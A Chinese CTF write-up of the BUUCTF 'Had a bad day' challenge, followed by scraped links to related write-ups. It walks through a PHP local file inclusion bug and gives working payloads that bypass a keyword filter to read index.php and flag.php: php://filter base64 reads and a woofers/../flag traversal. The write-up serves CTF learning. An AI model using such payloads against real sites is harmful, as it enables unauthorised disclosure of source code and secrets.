BUUCTF:Had a bad day
打开随意选择一个选项可以看到
怀疑是sql注入或者是文件包含,随便输入一个值返回php报错:
从图中可以知道是文件包含漏洞
先用php://filter伪协议读一下index.php源码看一下
php://filter/read=convert.base64-encode/resource=index
(这里构造成 php://filter/read=convert.base64-encode/resource=index.php 是会报错的,因为后端给文件拼接了 “.php” )
可以得到一串base64编码:
解密得到源码提取下来
<?php$file = $_GET['category'];if(isset($file)){if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){include ($file . '.php');}else{echo "Sorry, we currently only support woofers and meowers.";}}?>
传入的category需要有woofers/meowers/index才能包含以传入名为文件名的文件,看看能不能包含flag.php
利用include函数特性包含一下flag.php试试
index.php?category=woofers/../flag
可以看见源码中多了个can you read this flag
对此判断flag.php被包含在其中
php://filter伪协议可以嵌套一层协议,因此我们可以直接构造payload:
php://filter/read=convert.base64-encode/woofers/resource=flag
将这串base64码解密
BUUCTF:Had a bad day相关推荐
- BUUCTF的Web真题学习整理(一)
目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...
- BUUCTF寒假刷题-Web
前言 寒假横向刷题(尽量) BUUCTF
- BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...
- BUUCTF刷题笔记
BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...
- BUUCTF Quoted-printable编码
Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...
- BUUCTF NewStarCTF一些新知识记录
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 目录 前言 一.eazyxor 二.RSA_begin 三.Yesec no drumsticks 四.EzSnake 五.Pyre ...
- buuctf Mark loves cat
buuctf Mark loves cat 打开是个静态页面,源码也无任何有用信息 dirsearch扫描后发现.git泄露 GitHack.py下载得到两个php文件,接下来就是代码审计: flag ...
- BUUCTF·[MRCTF2020]天干地支+甲子·WP
题目来源 BUUCTF在线评测 (buuoj.cn) 附件 得到得字符串用MRCTF{}包裹 一天Eki收到了一封来自Sndav的信,但是他有点迷希望您来解决一下 甲戌 甲寅 甲寅 癸卯 己酉 甲寅 ...
- BUUCTF Reverse/findKey
BUUCTF Reverse/findKey 先看文件信息:32位程序,没有加壳 打开看看,标题为find flag,也没啥有用的信息 IDA32位打开,找到start函数,看到有个main,跟随跳转 ...
- BUUCTF中web方向题目记录(二)
双写绕过 BUUCTF[极客大挑战 2019]BabySQL 好像和前面的题目相似 check.php?username=admin&password=1' 单引号闭合 check.php?u ...
最新文章
- 学习 JavaScript (四)核心概念:操作符
- DM8168_ETV_V1.1开发板mount主机常见问题
- 小程序 --- 项目小练手Ⅰ
- 为什么zookeeper集群中节点配置个数是奇数个?
- The processing instruction target matching [xX][mM][lL] is not allowed.
- HTML字体转为大写,css字体属性和英文大小写转换
- 计算机网络 | 划分子网
- Python模拟数据生成器全代码
- 为什么Wannacry 勒索病毒加密的部分数据能恢复?
- 第十二周练兵区——编程题——不计入总分
- 水仙花数(所有自幂数)的实现详解-C语言
- filter_input
- [Python从零到壹] 十五.文本挖掘之数据预处理、Jieba工具和文本聚类万字详解
- ssis+ssas+ssrs 介绍
- 堆外内存的介绍及释放
- 面向组件编程之Unity 11.Quaternion.LookRotation 转自lijing_hi
- 吕鑫MFC学习系列三
- Python-Django毕业设计兴澜幼儿园管理系统(程序+Lw)
- 两个多月学习安卓的心得,给新手一点建议
- minitab学习系列--DOE因子分析P值和F值均为星号